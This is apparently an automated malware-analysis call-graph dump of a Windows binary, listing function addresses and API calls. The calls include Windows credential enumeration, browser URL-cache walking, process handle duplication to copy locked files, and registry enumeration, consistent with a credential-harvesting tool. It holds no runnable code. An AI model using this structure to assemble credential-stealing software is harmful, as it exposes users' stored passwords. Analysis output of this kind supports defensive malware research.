GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39137 404363 38556->39137 38559 40bf5d 39157 40440c 38559->39157 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39160 40bd5d 28 API calls 38572->39160 39161 404423 38572->39161 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39174 4135e0 38576->39174 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39177 4449b9 38593->39177 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39198 444972 GetVersionExW 38599->39198 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39202 444a85 42 API calls 38603->39202 38607->38602 38607->38603 39199 444aa5 42 API calls 38607->39199 39200 40a7a0 GetVersionExW 38607->39200 39201 444a85 42 API calls 38607->39201 38610 40399d 38609->38610 39203 403a16 38610->39203 38612 403a09 39217 40b1ab free free 38612->39217 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39214 40a02c CreateFileW 38614->39214 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39244 40414f memset 38634->39244 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39258 40b1ab free free 38637->39258 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39271 40a6e6 WideCharToMultiByte 38643->39271 38645 4087ed 39272 4095d9 memset 38645->39272 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39291 409b98 GetFileAttributesW 38668->39291 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39292 407fdf 75 API calls 38671->39292 39293 409b98 GetFileAttributesW 38672->39293 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39294 4082c7 198 API calls 38676->39294 39295 409b98 GetFileAttributesW 38677->39295 38680 408987 38681 4089a1 38680->38681 38682 40898c 38680->38682 39297 409b98 GetFileAttributesW 38681->39297 39296 408560 29 API calls 38682->39296 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39571 413f27 38700->39571 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39576 413959 38708->39576 39592 413ca4 38708->39592 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39606 40b1ab free free 38728->39606 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39607 40b1ab free free 38750->39607 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39608 409cea 38759->39608 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39611 414bb0 wcscpy 38764->39611 38765->38763 38767 414cd2 39612 4145ac RegQueryValueExW 38767->39612 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39613 409b98 GetFileAttributesW 38833->39613 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39614 40bb98 38836->39614 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39648 409a45 GetTempPathW 38842->39648 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39647 40a6e6 WideCharToMultiByte 38846->39647 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39660 424f26 122 API calls 38863->39660 38864 40b8bd memset 39651 425413 17 API calls 38864->39651 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39661 40a734 MultiByteToWideChar 38880->39661 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39652 4253ef 16 API calls 38885->39652 39653 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39653 39654 4253af 17 API calls 38885->39654 39655 4253cf 17 API calls 38885->39655 39656 447280 memset 38885->39656 39657 447960 memset memcpy memcpy memcpy 38885->39657 39658 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39658 39659 447920 memcpy memcpy memcpy 38885->39659 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39753 409b98 GetFileAttributesW 38898->39753 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39754 409b98 GetFileAttributesW 38906->39754 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39072 40a97a 38946->39072 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39077 40b1ab free free 38951->39077 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39078 40aa1d 38959->39078 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39080 405220 38971->39080 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39071 40b1ab free free 39020->39071 39021->39020 39022 40e540 39022->39017 39070 40e2ab 30 API calls 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39070->39022 39071->39008 39073 40a980 39072->39073 39074 40a995 _wcsicmp 39073->39074 39075 40a99c wcscmp 39073->39075 39076 40a8bb 39073->39076 39074->39073 39075->39073 39076->38949 39076->38950 39077->38953 39079 40aa23 RegEnumValueW 39078->39079 39079->38962 39079->38963 39081 405335 39080->39081 39082 40522a 39080->39082 39081->38547 39083 40b2cc 27 API calls 39082->39083 39084 405234 39083->39084 39085 40a804 8 API calls 39084->39085 39086 40523a 39085->39086 39125 40b273 39086->39125 39088 405248 _mbscpy _mbscat GetProcAddress 39089 40b273 27 API calls 39088->39089 39090 405279 39089->39090 39128 405211 GetProcAddress 39090->39128 39092 405282 39093 40b273 27 API calls 39092->39093 39094 40528f 39093->39094 39129 